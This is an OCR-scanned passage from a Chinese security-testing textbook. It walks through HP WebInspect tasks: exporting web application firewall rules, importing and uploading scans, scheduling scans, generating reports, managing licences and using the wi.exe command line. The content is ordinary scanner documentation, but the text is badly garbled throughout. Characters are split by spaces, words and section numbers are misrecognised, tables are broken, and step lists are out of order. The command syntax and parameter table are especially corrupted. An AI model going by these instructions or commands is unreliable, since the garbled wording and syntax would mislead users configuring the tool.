7) 要 将 .CSW 文件 导入 到 TippingPoint 的 安全 管理 系统 ， 单 击 Profiles( 配 置 )， 单 击 DV 
Toolkit Packages(DV 工具 包 )， 然 后 单 击 Import( 导 入 ) 并 选择 .csw 文件 。 导 入 完成 后 ， 单 击 
Activate( 激 活 )， 激 活 完成 后 ， 单 击 Import( 导 入 ) 并 选择 要 分 发 文件 的 设备 。IPS 配置 文件 会 阻 


10.2.14 Web 应 用 防火 墙 导出 保护 规则 


生成 并 保存 一 个 完整 漏洞 的 导出 文件 (XMIL), 该 漏洞 由 HP WebInspect 的 Web 应 用 程序 
的 扫描 过 程 中 检测 : 
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1) 打开 感 兴趣 的 扫描 (或 单 击 包含 一 个 要 打开 的 扫描 的 选项 卡 )， 然 后 单 击 File( 文 件 )， 
再 依次 单 击 Export( 导 出 ) 和 Protection Rules to Web Application Firewall(Web 应 用 防火 墙 保护 
规则 )， 如 图 10-30 所 示 。 


Export Scan to Web Application Firewall EN 


Scrub Data 


Type Replace Match 
E ssn OXXX N/A 
[7] Credit Card )00000000000000 N/A 
[E] 1P Address XXXJ00.00000X — N/A 


图 10-30 Web 应 用 防火 墙 保 护 规则 


2) 指定 以 同样 的 方式 擦洗 数据 类 型 ， 如 File 一 Export 一 Scan(“ 文 件 ” 一 “导出 ”一 “ 扫 
描 ”) 选 项 。 擦洗 数据 (Scrub Data) 组 在 默认 情况 下 包含 三 个 不 可 编辑 的 正则 表达 式 函数 ， 在 字 
符 串 格 式 化 中 它们 将 用 一 个 和 替代 每 个 数字 ， 如 一 个 社会 安全 号 码 、 信 用 卡号 码 或 卫 地 址 。 
包括 这 个 搜索 和 替换 函数 的 数据 类 型 ， 选 择 与 其 相关 的 复 选 框 。 

3) 单 击 Export( 导 出 )。 

4) 指定 要 保存 导出 的 数据 ， 然 后 单 击 保存 路 径 和 文件 名 。 当 指定 后 ， 一 个 完整 的 导出 
(XML) 文 件 被 保存 。 


10.2.15 导入 扫描 


遵循 以 下 步 又 由 男 一 个 实例 导入 Weblnspect 的 扫描 。 
1) "fal; File( 文 件 )， 再 单 击 Import Scan( 导 入 扫描 )。 
2) 使 用 标准 文件 选择 窗口 ， 从 Files of Type( 文 件 类 型 ) 列 表 中 选择 一 个 选项 : 
a) Scan files(*.scan): 扫描 文件 设计 创建 由 WebInspect 10.0 版 本 开始 。 
b) SPA files(*.spa): 扫描 文件 创建 在 WebInspect 10.0 版 本 之 前 推出 。 
3) 选择 一 个 文件 ， 然 后 单 击 Open( 打 开 )。 
如 果 附 件 被 扫描 导出 ， 这 些 附 件 将 被 导入 并 保存 在 导入 扫描 的 子 目 录 。 默 认 位 置 是 
C:\Documents and Settings -usemame- Local Settings\Application Data\HP\HP WebInspect\ScanData' 
Imports\<DirectoryName>\<filename>， 其 中 DirectoryName 是 导出 /导入 扫描 的 了 D 号 。 


10.2.16 ”运行 AMP 或 Weblnspect Enterprise 扫描 
此 功能 专 为 用 户 设计 , 用户 更 偏爱 在 WebInspect 中 配置 扫描 , 而 非 在 AMP 或 WebInspect 


Enterprise 中 。 用 户 可 以 修改 设置 ， 并 在 WebInspect 运行 扫描 ， 重 复 这 个 过 程 ， 直 到 达到 | 
户 认定 的 最 佳 设 置 。 然 后 ， 可 将 打开 的 扫描 设置 为 AMP 或 WebInspect Enterprise， 它 创建 了 
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一 个 扫描 请 求 ， 并 将 它 放 置 在 扫描 队列 中 ， 供 下 一 个 可 用 的 检测 部 件 使 用 。 
1) 打开 扫描 。 
2) 如 果 没 有 连接 到 企业 服务 器 ， 单 击 Enterprise Server 菜单 ， 并 选择 Connect to AMP or 
Connect to WebInspect Enterprise( 连 接 到 AMP 或 连接 到 WebInspect Enterprise)。 
3) 单 击 Scan( 扫 描 ) 菜 单 ,选择 Run in AMP(TE AMP 中 运行 ) 或 Run in WebInspect Enterprise 
(在 WebInspect Enterprise 中 运行 )( 或 直接 单 击 工具 栏 上 相应 的 按钮 )。 
4) 如 果 已 连接 到 AMP: 
a) 在 AMP 窗口 运行 扫描 的 Scan Name( 扫 描 名 称 ) 文 本 框 中 ， 键 入 一 个 名 称 ， 或 保留 
名 称 的 空白 ， 让 AMP 指定 名 称 ， 如 图 10-31 所 示 。 
b) 如 果 在 AMP 上 一 个 网 站 存在 与 扫描 对 应 的 URL， 该 网 站 被 默认 选中 。 用 户 可 以 
使 用 相应 的 按钮 更 改 网 站 ， 也 可 以 创建 一 个 网 站 。 
当 连 接 到 8.1 或 更 高 版 本 时 ， 除 了 网 站 名 称 外 ,本 Site( 网 站 ) 列 表 中 还 会 显示 组 织 和 项 目 
名 称 。 对 于 AMP 8.0 和 更 早 的 版 本 ， 只 有 列 出 网 站 名 称 。 


Run Scan in AMP 


Scan Name: |Thackscan| | 


Site: (Default Organization : Default Project : zero x| 


Assessment: [zero v 


图 10-31 运行 扫描 的 AMP 窗口 


c) 选择 将 与 此 扫描 相关 联 的 一 个 评估 (可 选 )， 或 单 击 Create( 创 建 ) 创 建 一 个 评估 。 
d) 单 击 OK( 确 定 )。 
只 有 WebInspect 连接 到 AMP 9.0 或 更 高 版 本 ， 才 会 启用 评估 。 此 外 ， 要 建立 一 个 评估 ， 
必须 拥有 AMP 的 管理 权限 。 
对 于 AMP 8.0 或 更 早 版 本 ， 必 须 有 权 创 建 自 定义 扫描 。 对 于 AMP 8.1 或 更 高 版 本 ， 必 须 
有 权 在 项 目 中 创建 扫描 。 
5) 如 果 已 连接 到 WebInspect Enterprise: 
a) TE Run Scan in WebInspect Enterprise 对 话 框 中 , 输入 扫描 的 名 称 , 如 图 10-32 所 示 。 
b) 选择 一 个 项 目 和 一 个 项 目 版 本 。 
c) 单 击 OK( 确 定 )。 
如 果 通 过 所 有 的 权限 检查 ， 扫 描 被 创建 ， 并 根据 角色 (最 多 3 个 ， 这 是 默认 的 ) 允 许 的 最 
高 优先 级 给 扫描 分 配 优先 级 。 
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E Run Scan in Weblnspect Enterprise 


Project: 


Project Version: |1.1 


图 10-32 Run Scan in WebInspect Enterprise 对 话 框 


10.2.17 上传 一 个 扫描 到 企业 服务 器 


使 用 以 下 步骤 从 WebInspect 上 传 一 个 文件 扫描 到 企业 服务 器 (评估 管理 平台 或 
WebInspect Enterprise)。 
1) 单 击 WebInspect Enterprise Server(WebInspect Enterprise 服务 器 ) 菜 单 , 然后 选择 Upload 
Scan( 上 传 扫描 )。 
2) 在 上 传 扫描 窗口 中 ， 选 择 扫描 名 称 列 中 的 一 个 或 多 个 WebInspect 扫描 。 要 访问 不 同 
的 数据 库 扫描 , 单 击 Connections( 连 接 ), 然后 在 数据 库 应 用 程序 设置 中 , 在 Connection Settings 
for Scan Viewing( 扫 描 视 图 的 连接 设置 ) 下 更 改选 项 。 
3) 如 果 上 传 到 AMP, M AMP 的 网 站 列 的 下 拉 列表 中 为 每 个 扫描 选择 网 站 。 每 次 扫描 
都 必须 分 配 到 一 个 网 站 。 该 计划 试图 选择 匹配 扫描 文件 中 的 “扫描 网 址 ”的 网 站 ， 但 也 可 以 
选择 另 一 个 。 如 果 相 应 的 网 站 不 存在 ， 用 户 可 以 创建 一 个 ( 需 拥 有 AMP 权限 )。 
4) 从 评估 栏 的 下 拉 列 表 中 选择 一 个 评估 (如 果 上 传 到 AMP， 则 是 可 选 的 )。 
如 果 一 个 相应 的 评估 不 存在 ， 可 以 通过 以 下 步骤 在 AMP 中 建立 一 个 评估 。 用 户 必 须 具 
有 AMP 权限 才能 创建 评估 。 请 注意 ， 只 有 当 WebInspect 连接 到 AMP 9.0 或 更 高 版 本 时 ， 此 
功能 才 被 启用 。 
a) 单 击 Create Assessment( 创 建 评 估 )。 
b) 选择 与 此 评估 相关 联 的 网 站 。 
c) 为 评估 输入 一 个 名 称 和 (可 选 ) 描 述 。 
d) 单 击 OK( 确 定 )。 
5) 如 果 上 传 到 WebInspect Enterprise， 从 相应 的 下 拉 列 表 中 为 每 个 扫描 选择 一 个 项 目 和 
项 目 版 本 。 
该 计划 试图 选择 匹配 扫描 文件 中 “扫描 网 址 ”的 项 目 和 项 目 版 本 ， 但 用 户 也 可 选择 男 一 


6) 单 击 Upload( 上 传 )。 
仅 当 WebInspect 连接 到 AMP 8.1 及 更 高 版 本 ， 才 会 选中 Show Organizations and Projects 
(显示 组 织 和 项 目 ) 复 选 框 。 


*352* 软件 安全 测试 及 工具 应 用 (第 2 版 ) 


10.2.18 “管理 设置 


此 功能 允许 用 户 创建 、 编 辑 、 删 除 、 导 入 和 导出 扫描 设置 文件 。 
注意 : 用户 也 可 以 载 入 和 保存 设置 , 然后 从 默认 设置 窗口 恢复 出 厂 默认 设置 . 单 击 Edit( 编 
辑 )， 再 单 击 Default Scan Settings( 预 设 扫描 设置 )。 


1) 从 WebInspect 编辑 菜单 选择 Manage Settings( 管 理 设置 )。 打 开 管理 设置 窗口 ， 如 图 
10-33 所 示 。 


Manage Settings 


Settings Files: 

| Default. xml 
Halloween. xml 
JDTcrawlOnly.xml 
stepModesettings.xml 


图 10-33 Manage Settings 窗口 
2) 要 创建 一 个 设置 文件 : 
a) 单 击 Add( 添 加 )。 
b) 在 创建 新 的 设置 窗口 中 ， 更 改 设置 。 
c) 当 完 成 后 ， 单 击 OK( 确 定 )。 
d) 用 一 个 标准 的 文件 选择 对 话 框 ， 命 名 并 保存 文件 。 
3) 要 编辑 设置 文件 : 
a) 选择 一 个 文件 。 
b) 单 击 Edit( 编 辑 )。 
c) 在 创建 新 的 设置 窗口 中 ， 更 改 设置 。 
d) 完成 后 ， 单 击 OK( 确 定 )。 
4) 要 删除 设置 文件 : 
a) 选择 一 个 文件 。 
b) 单 击 Delete( 删 除 )。 
5) 要 导入 一 个 设置 文件 : 
a) 单 击 Import( 导 入 )。 


6) 要 导出 一 个 设置 文件 : 


b) 使 用 一 个 标准 文件 选择 对 话 框 ， 选 择 一 个 设置 文件 并 单 击 Open( 打 开 )。 
a) 选择 一 个 文件 。 
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b) 使 用 一 个 标准 文件 选择 对 话 框 ， 选 择 一 个 设置 文件 并 单 击 Save( 保 存 )。 
要 使 用 保存 的 设置 文件 扫描 : 
1) 从 WebInspect 编辑 菜单 中 ， 选 择 Default Settings( 默 认 设置 )。 
2) 在 左 侧 栏 中 默认 设置 窗口 的 底部 ， 单 击 Load settings from file( 从 文件 加 载 设置 )。 
3) 使 用 一 个 标准 文件 选择 对 话 框 ， 选 择 要 使 用 的 设置 文件 ， 单 击 Open( 打 开 )。 选 择 的 
文件 就 是 默认 设置 文件 。 


10.2.19 ”管理 扫描 


此 功能 允许 打开 、 重 命名 或 删除 包含 以 前 扫描 结果 的 文件 。 也 可 以 选择 一 个 数据 库 : 本 
地 (扫描 在 用 户 机 器 上 配置 了 SQL Server 2008 Express 数据 库 列 表 ) 或 远程 (扫描 在 服务 器 上 或 
网 络 上 配置 了 SQL Server 2008 Standard 数据 库 列 表 )， 或 选择 两 者 。 在 开始 页 面 选项 卡 上 ， 
单 击 Manage Scans( 管 理 扫描 )， 如 图 10-34 所 示 。 


Home Manage scalis? Manage Schedule ] 


图 10-34 ”管理 扫描 


扫描 列表 会 出 现在 开始 页 面 右 侧 窗 格 中 。 

默认 情况 下 , WebInspect 在 用 户 机 器 上 列 出 所 有 存储 在 SQL Server Express 和 SQL Server 
标准 版 (如 果 配 置 ) 的 扫描 。 扫 描 的 当前 状态 显示 在 状态 栏 中 。 

用 户 根据 喜好 可 以 基于 列 标题 的 分 类 对 扫描 进行 分 组 (可 选 )。 只 要 拖 动 标题 ， 并 将 其 放 
到 分 组 区 域 即 可 。 

用 户 也 可 以 执行 大 部 分 功能 ， 要 生成 一 个 报告 ， 通 过 右键 单 击 一 个 条 目 ， 然 后 从 快捷 菜 
单 中 选择 命令 。 


10.220 ”管理 计划 扫描 


用 户 可 以 指示 WebInspect 在 一 个 指定 的 时 间或 日 期 进行 评估 。 选择 选项 和 设置 保存 在 一 
个 特殊 文件 中 ， 通 过 Windows 服务 器 启动 WebInspect( 如 有 必要 )， 并 启动 扫描 访问 。 

注意 : 计划 扫描 完成 后 ， 不 会 在 WebInspect 开始 页 面 的 最 近 扫描 列表 中 显示 。 要 在 完成 
后 访问 计划 扫描 ， 选 择 开始 页 面 ， 然 后 单 击 Manage Scans( 管 理 扫描 )。 

1) 在 开始 页 面 选项 卡 上 ， 单 击 Manage Schedule( 管 理 计划 )， 如 图 10-35 所 示 。 


Home | Manage Scans Manase schedole 


图 10-35 管理 计划 


WebInspect 列 出 所 有 的 计划 扫描 ， 包 括 那 些 已 经 运行 的 计划 扫描 。 

2) (可 选 ) 用 户 可 以 根据 喜好 对 计划 扫描 在 基于 列 标题 的 分 类 上 进行 分 组 。 只 需要 拖 动 标 
题 ， 并 将 其 放 到 分 组 区 域 即 可 。 

3) 使 用 工具 栏 按钮 执行 下 列 功能 ， 如 图 10-36 所 示 。 
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[de Add /'Edit x Delete [> Start @ stop © Refresh | 


图 10-36 工具 栏 按钮 


1. 计划 一 个 扫描 


1) 执行 下 列 操 作 之 一 : 

* 在 WebInspect 开始 页 面 ， 单 击 Manage Schedule( 管 理 计 划 )。 
。 单 击 File( 文 件 )， 再 单 击 Schedule( 计 划 )。 

计划 扫描 列表 会 显示 在 开始 页 面 的 右 窗 格 中 ， 如 图 10-37 所 示 。 


© Refresh 


ve Recurrence last Run Time Last Run Status 
Start a Basic Scan 
Scan a single Web 


me: Next Week (1 tem) 


Site: http://zero.we... Site First Sunday of eac. Not Yet Run. 


® Start a Web Service Scan 
: m 


Generate a Report 


Analyze tem reports. 


Start SmartUpdate 


Jpdate se ecks and patches. 


图 10-37 计划 扫描 列表 


2) 单 击 Add( 添 加 )。 

3) 在 扫描 组 的 类 型 ， 请 选择 下 列 操作 之 一 

。 网 站 扫描 

。 Web 服务 扫描 

。 企业 扫描 

4) 指定 希望 进行 的 扫描 。 选 项 包括 : 

e YEN(Immediately). 

。 运行 一 次 (Run Once): 当 扫描 开始 时 修改 日 期 和 时 间 。 用 户 可 以 单 击 下 拉 箭 头 以 便 在 
日 历 中 选择 日 期 。 
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。 重复 计划 (Recurrence Schedule): 使 用 滑 块 来 选择 一 个 频率 (每 日 、 每 周 或 每 月 )。 然 后 
指定 扫描 开始 的 时 间 ( 对 于 每 周 或 每 月 ) 以 及 提供 其 他 计划 信息 。 

5) 单 击 Next( 下 一 步 )。 

6) 选择 扫描 类 型 的 输入 设置 。 

7) 仅 对 网 站 和 Web 服务 扫描 ， 用 户 可 选择 在 扫描 结束 后 生成 报告 : 

。 选择 Generate Reports( 生 成 报告 )， 然 后 单 击 Select a Report 超 链 接 。 

。 继续 选择 报告 (下 一 步 中 )。 

8) 计划 扫描 不 生成 报告 ， 单 击 Schedule( 计 划 )。 

2. 选择 一 个 报告 


如 果 选 择 计划 扫描 中 包括 一 个 报告 ， 将 显示 Selecta Report 对 话 框 ， 如 图 10-38 所 示 。 


fil Scheduled Scan Report Wizard 


Select a Report 
Select the reports you would like to run after the scan finishes Step 1 of 2 


Favorites: 

Standard Reports. Alert View 
C Aggregate. 
Alert View 
C Attack Status Crawled URLS 
C Compliance 7 
aai Unt Included Session Details: 
C Developer Reference 回 cookes 
C Duplicates 回 postpata 
[C Executive Summary Request 
False Positive. D 


C] QA Summary 

C Scan Difference False Positive 

- Scan Log Included Session Details: 
Trend 

[C Vulnerability — 

E] Vulnerability (Legacy) reponse 

[E] Stack Trace (if available) 


There are no inputs for this report. 


图 10-38 Select a Report 对 话 框 


1) 从 收藏 夹 列表 选择 报告 (可 选 )。 

一 个 “收藏 夹 ” 仅 是 一 个 或 多 个 报告 及 其 相关 参数 的 命名 集合 。 要 创建 一 个 最 喜欢 的 选 
定 报告 和 参数 ， 单 击 Favorites( 收 藏 夹 ) 列 表 ， 然 后 选择 Add to favorites( 添 加 到 收藏 夹 )。 

2) 选择 一 个 或 多 个 报告 。 

3) 对 任何 参数 提供 的 信息 都 是 必需 的 。 必 需 的 参数 用 红色 标 出 。 

4) 单 击 Next( 下 一 步 )。 

出 现 Configure Report Settings 对 话 框 ， 如 图 10-39 所 示 。 
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dii Scheduled Scan Report Wizard 


Configure Report Settings 
Select options below to use when generating the report(s) Step 2 of 2 


Options 
[V Automatically generate filename 


[E] Aggregate reports into one report 


Headers and Footers 
Header/Footer Report: |HP Default ~ 


Cover page title: Web Application Assessment Report. 
Cover page footer: 


Content page footer: | Hewlett Packard, Inc. 


Cover page image: 


| Cemex ) (memes ] ence ) 


图 10-39 Configure Report Settings 对 话 框 


1) 如 果 选 择 Automatically Generate Filename( 自 动 生成 文件 名 )， 该 报告 文件 的 名 称 将 被 
格式 化 为 <reportname><date/time>.<extension>。 例 如 ， 如 果 创 建 PDF 格式 的 合 规 报 告 ， 并 在 
4 月 5 日 6:30 生成 报告 ， 文 件 名 是 “ 合 规 报 告 04 05 200906_30pdf”。 这 对 经 常 性 的 扫描 非 
常 有 用 。 

报告 被 写 于 应 用 程序 设置 生成 报告 的 指定 目录 中 。 

2) 如 果 没 有 选择 Automatically Generate Filename( 自 动 生成 文件 名 )， 在 文件 名 框 中 输入 
文件 名 。 

3) 从 Export Format( 输 出 格式 ) 列 表 中 选择 报告 格式 。 

4) 如 果 选 择 了 多 个 报告 , 则 可 以 通过 选择 Aggregate reports into one report( 汇 总 报告 合 
为 一 个 ) 来 汇总 报告 。 

5) 选择 用 于 报告 定义 的 页 眉 和 页 脚 的 模板 ， 如 有 必要 ， 提 供 所 需 的 参数 。 

6) 单 击 Finished( 完 成 )。 

7) 单 击 Schedule( 计 划 )。 

要 在 运行 时 停止 计划 扫描 ， 请 从 管理 计划 列表 中 选择 扫描 ， 并 单 击 贸 stop (或 右键 单 各 
扫描 ， 然 后 从 快捷 菜单 中 选择 Stop Scan( 停 止 扫描 ))。 

要 重新 启动 一 个 停止 扫描 ， 请 从 管理 计划 列表 中 选择 扫描 ， 并 单 击 忆 star (或 右键 单 
扫描 ， 然 后 从 快捷 菜单 中 选择 Start Scan( 开 始 扫 描 ))。 


zu 


zu 
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10.221 生成 报告 


按照 下 面 的 步骤 对 已 运行 的 扫描 生成 报告 。 这 个 步骤 并 不 适用 于 计划 扫描 。 

1) 单 击 WebInspect 工具 栏 上 的 Reports( 报 告 )， 然 后 单 击 Generate Report( 生 成 报告 )， 或 
在 WebInspect 开始 页 面 上 单 击 Generate a Report( 生 成 报告 )， 此 时 将 显示 一 个 报告 窗口 。 

2) 选择 一 个 或 更 多 扫描 (通过 名 称 、URL ER IP 地 址 指定 )。 


3) 


选项 。 


单 击 Advanced( 高 级 (可 选 ， 位 于 窗口 底部 )， 选 择 要 保存 的 报告 以 及 页 眉 和 页 脚 模板 


4) 单 击 Next( 下 一 步 )。 
5) 从 收藏 夹 列表 选择 报告 (可 选 )。 
6) 选择 一 个 或 多 个 报告 : 


合计 (Aggregate): 此 报告 可 让 用 户 组 合 多 台 服 务 器 的 扫描 结果 。 它 列 出 漏洞 总 数 ， 
并 按 严重 程度 显示 相关 的 条 形 图 ， 还 列 出 每 个 服务 器 的 漏洞 。 

警报 视图 (Alert View): 每 次 成 功 的 攻击 代理 和 相关 漏洞 的 列表 (作为 信息 显示 在 摘要 
窗 格 中 的 警报 选项 卡 上 )。 

攻击 状态 (Attack Status): 列 出 漏洞 了 P 号 、 检 查 名 称 以 及 所 有 攻击 代理 的 严重 等 级 。 
合 规 性 (Compliance): 本 报告 提供 等 级 来 使 用 户 的 申请 符合 某 些 政府 法 规 或 公司 指导 
方针 。 用 户 必须 首先 创建 一 个 合 规 的 模板 。 

疏 行 网 址 (Crawled URLs): 对 于 息 行 过 程 中 直到 的 每 一 个 URL， 该 报告 列 出 了 发 送 
的 Cookie 和 原始 的 HTTP 请 求 和 响应 。 


注意 : 如 果 WebInspect 无 法 完成 这 项 报告 或 者 报告 生成 极为 缓慢 ， 修 改 报告 如 下 : 

1) 打开 报告 设计 器 。 

2) IARAA: 非 唯一 子 报表 。 

3) 对 于 GroupHeaderRequest 和 GroupHeaderResponse 下 方 的 RichTextBoxes, MaxLength 
属性 设置 为 4096。 

4) 保存 报告 。 


开发 人 员 参 考 (Developer Reference): 每 个 表单 的 总 计 和 详细 说 明 ， 包 括 JavaScript. 
电子 邮件 、 评 论 、 隐 藏 控制 和 网 站 上 发 现 的 Cookie， 用 户 可 以 选择 其 中 一 个 或 多 个 
引用 类 型 。 

EA Duplicates): 该 报告 包含 关于 漏洞 的 信息 ， 由 SecurityScope 进行 检测 ， 可 以 追 
溯 到 同一 来 源 ， 其 中 首先 列 出 不 相关 漏洞 总 数 和 独特 漏洞 数量 的 柱状 图 对 比 。 

内 容 提要 (Executive Summary): 基本 统计 资料 ， 加 上 能 反映 用 户 漏洞 应 用 程序 水 平 
的 图 表 和 图 形 。 

误 报 (false Positives): 显示 原本 归 类 为 漏洞 的 URL 信息 ， 但 后 来 用 户 确定 是 误 报 。 
QA 摘要 (QA Summary): 含 断 开 的 链接 、 服 务 器 错误 、 外 部 链接 和 超时 的 所 有 页 面 
URL 列表 。 可 选择 其 中 一 个 或 多 个 类 别 。 

扫描 差异 (Scan Difference); 该 报告 比较 了 两 种 扫描 和 报告 差异 ， 如 漏洞 、 页 面 和 发 
生 在 一 个 网 站 上 文件 未 找到 的 回应 。 
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扫描 日 志 (Scan Log): 在 扫描 期 间 (作为 信息 显示 在 摘要 窗 格 的 扫描 日 志 选 项 卡 上 ) 由 
WebInspect 执行 活动 的 顺序 列表 。 

趋势 (Trend): 此 报告 可 让 用 户 监控 开发 团队 解决 漏洞 的 进展 。 例 如 ， 用 户 可 以 检查 
初始 扫描 结果 和 团队 何 时 开始 修复 这 些 问 题 。 然 后 每 周一 次 ， 重 新 扫描 该 网 站 和 归 
档 结 果 。 量 化 进度 ， 生 成 一 个 趋势 报告 ， 分 析 迄 今 为 止 进行 的 所 有 扫描 结果 。 该 报 
告 包括 显示 漏洞 数量 的 图 表 ， 按 严重 程度 ， 将 每 次 扫描 进行 的 日 期 定义 在 一 个 时 间 
轴 上 。 重 要 提示 : 为 确保 获得 可 靠 结果 ， 每 次 扫描 时 使 用 相同 的 策略 。 

漏洞 (Vulnerability)， 每 个 漏洞 ( 按 严 重 程度 选择 ) 的 详细 报告 和 解决 方案 的 建议 。 
漏洞 (遗留 )(Vulnerability(Legacy)): 每 个 漏洞 的 详细 报告 ， 以 及 有 关 的 补救 建议 。 


5) 任何 参数 的 提供 信息 可 能 会 被 请 求 ， 一 个 感叹 号 表示 一 个 必需 的 参数 。 

6) 如 果 想 制作 单独 选项 卡 (而 不 是 合并 在 一 个 选项 卡 的 所 有 报告 ) 的 个 别 报告 ， 则 选择 
Open Reports in Separate Tabs( 在 单独 选项 卡 上 打开 报告 )。 

7) 单 击 Finish( 完 成 )， 如 图 10-40 所 示 。 


图 10-40 “生成 的 报告 


WebInspect 生成 报告 和 显示 选项 卡 后 ， 可 以 通过 单 击 按钮 来 保存 报告 。 
报告 可 保存 为 下 列 格式 : 


Adobe 便携 式 数 据 格式 (PDF) 
超 文 本 标记 语言 (HTML) 
本 机 WebInspect 的 内 部 格式 
RTF 格式 (RTF) 

文本 (TXT) 

微软 的 Excel(XLS) 


单 击 Advanced( 高 级 )( 位 于 生成 报告 窗口 的 底部 )， 选 择 保存 报告 ， 并 设置 页 由 和 页 脚 模 
板 选 项 ， 如 图 10-41 所 示 。 
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dil Advanced Report Options 


Save reports to disk 


Automatically generate filename 


Headers and Footers ES 
Header/Footer Report: | HP Default Y 


Cover page title: Web Application Assessment Report 
Cover page footer: 


Content page footer: | Hewlett Packard, Inc. 


Cover page image: Use custom image 


图 10-41 高 级 报告 选项 


Save reports to disk (报告 保存 到 磁盘 ): 选择 此 选项 可 将 报告 保存 到 磁盘 中 。 
Automatically generate filename (自动 生成 文件 名 ): 将 报告 保存 到 磁盘 时 选择 此 选项 ， 
该 报告 文件 的 名 称 将 被 格式 化 为 <reportname><dateltime>.<extension>。 例 如 ， 如 果 创 
建 PDF 格式 的 合 规 报告 ， 并 在 4 月 5 日 630 生成 报告 ， 文 件 名 是 “ 合 规 报 告 
04 05 200906 30pdf。” 这 对 重复 性 的 扫描 非常 有 用 。 

如 果 选 择 一 个 以 上 的 报告 类 型 ， 然 后 <reportname> 将 是 “联合 报告 ”。 

报告 存放 于 应 用 程序 设置 生成 报告 的 指定 目录 中 。 

如 果 不 选择 Automatically generate filename( 自 动 生成 文件 名 ), 用 一 个 文件 名 替换 默认 
的 “自动 根 文件 名 ”。 

导出 格式 : 选择 一 个 报告 格式 。 

页 眉 和 页 脚 ， 选择 报告 的 页 眉 和 页 脚 格式 ， 然 后 输入 或 选择 组 件 。 


10.222 ”许可 证 管理 


首次 安装 成 功 并 启动 WebInspect 后 ， 系 统 会 提示 输入 惠普 发 送 给 用 户 的 许可 证 令 牌 。 在 
输入 令 牌 和 客户 信息 后 ， 应 用 程序 连接 HP 服务 器 并 下 载 用 户 特定 的 安装 许可 证 信息 。 
有 两 种 方法 可 以 控制 WebImspect 的 许可 证 : 


直接 连接 到 HP 公司 的 许可 证 服务 器 。 
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。 连接 到 本 地 许可 证 和 基础 设施 管理 。 
1. 修改 许可 证 
1) 单 击 Edit( 编 辑 )， 再 单 击 Application Settings( 应 用 程序 设置 )。 


2) 选择 License( 许 可 证 ) 类 别 。 
连接 到 HP， 如 图 10-42 所 示 。 


Application Settings 


S» WebInspect — 


Licensing Method: Direct to HP corporate license server 

Activation Token: — 45532j2-333d-3333-9999-2k8c9301de99 

Expiration Date: 12/30/9999 2:00:00 PM Order Number: HPINT-WebiInspect 
Maintenance Date: 9/9/2013 4:00:00 PM SAID: 777777777777 
Last Updated: 12/8/2010 8:07:58 AM 

Purchaser: 


AMP 
Smart Update. 
Support Channa 
HP Quality Center 


IBM Rational ClearQuest [Configure Licensing... 


让 ee e 
s to the updata bistan. This will contact HP to retrieve any changes that may 


pr A E E peer [uponte ] 


[_% ]( cancel 


图 10-42 许可 证 管理 界面 


2. 更 新 许可 证 


如 果 是 试用 版 升级 或 以 其 他 方式 修改 许可 证 ， 则 单 击 Update( 靠 近 右 下 角 的 超 链接 ) 来 更 
新 许可 证 。 该 应 用 程序 将 在 计算 机 上 再 次 连接 HP 服务 器 和 更 新 本 地 存储 的 信息 。 


3. 停 用 许可 证 


WebInspect 可 以 授权 被 分 配 到 特定 的 计算 机 。 如 果 想 将 许可 证 转移 到 其 他 计算 机 : 

1) 复制 激活 令 牌 。 

HER 为 避免 丢失 或 忘记 激活 令 牌 ， 建 议 书写 或 打印 保存 。 

2) 单 击 Deactivate( 停 用 )。 

3) 在 另 一 台 已 成 功 安装 WebInspect 的 电脑 上 ， 进 入 WeblInspect 的 许可 证 设置 并 输入 激 
活 令 牌 。 
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10.2.23 dp $11 


户 可 使 用 程序 WLexe 通过 一 个 命令 行 界面 启动 多 个 WebInspect 功能 。 键 入 命令 时 ， 
请 使 用 以 下 语法 ， 如 图 10-43 所 示 : 


wiexe -u url [-s file] [-ws file] [-Framework name] [-CrawlCoverage name][-ps policyID | -pe path] 
-abianjam/ad|aalak {creds}] [-olc][-n name] [-e[abedefzhijklmno] file] [-xlxdlxalxn] [-b filepath] [-v] [-?] [-r 
report name -y report. type -w report favorite -f report export file -g[phacxe][-t 

compliance template file]] [-d filepath -m filename ][-i scanid] [-ir scanid] [-db] 


图 10-43 ”使 用 WLexe 命令 行 界面 启动 多 个 WeblInspect 功能 


要 在 命令 行 中 运行 多 个 扫描 ， 创 建 并 执行 一 个 批 处 理 文件 ， 使 用 类 似 于 下 面 的 代码 ， 如 
图 10-44 所 示 : 


3 \program files\HP\HP Webinspect 
i.exe -u http://172.16.60.19 -ps 4 


i.exe -u http://www.mywebsite.com 
i.exe -u http://172.16.60.17 
i.exe -u http://172.16.60.16 


图 10-44 运行 多 个 扫描 ， 创 建 并 执行 一 个 批 处 理 文件 
内 容 如 表 10-10 所 定义 ， 和 斜体 项 是 要 求 的 值 。 


310-10 d TEE 


类 别 2 ZU E X 
? 显示 用 法 
URL (include host/port/scheme) 
通 党 注意 1: 当 使 用 -s( 设 置 文件 ) 的 -u 参数 时 ,一 定 要 指定 -x、-xa、-xd 或 -xn 
u {url} 参数 来 限制 扫描 文件 夹 。 如 果 不 这 样 做 , 可 能 导致 在 一 定 条 件 下 无 限制 
的 审计 。 
注意 2: 如 果 URL 中 包含 一 个 符号 (&)， 则 必须 用 引号 把 URL 括 起 来 
a 设置 文件 
mx 注意 : 设置 文件 中 命令 行 参数 优先 于 值 
o 仅 审计 
c tut 
X 限制 到 根 文件 夹 
限制 到 目录 和 上 一 级 目录 
xd 限制 到 目录 和 子 目 录 
通常 xn 忽略 “限制 到 文件 夹 ”规则 中 引用 的 设置 文件 
n (name 扫描 名 称 
b {filepath; 使 用 给 定 的 SecureBase 文件 
d (filepath] 将 数据 库 移 动 到 文件 路 径 
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( 续 表 ) 
类 别 参数 E X 
T M (filename 将 数据 库 移动 到 文件 名 
i(scanid) 扫描 识别 码 (GUID) 
使 用 非 自 定义 策略 ， 相 应 值 的 ID 是 : 
二 标准 
2= 突 击 
3=SOAP 
4= 快 速 
5= 安 全 
ERIE 
— 7= 空 白 
审核 策略 ib 
17= 应 用 
18= 平 台 
1001=SQL 注入 
1002= 跨 站 脚本 
1003=OWASP Top 10 项 目 
1004= 所 有 检查 
1005= 被 动 
使 用 自 定义 策略 ， 指 定 完整 的 路 径 和 文件 名 ， 如 : 
Pe {path} C: | MyPolicies MyCustomPolicy.policy 
ab {id:pwd 基本 模式 (用 户 名 和 密码 ) 
an (id:pwd NTLM 模式 (用 户 名 和 密码 ) 
-— ad {id:pwd} 摘要 模式 (用 户 名 和 密码 ) 
aa (id:pwd] 自动 模式 (用 户 名 和 密码 ) 
d (filepath Kerberos 的 模式 (用 户 名 和 密码 ) 
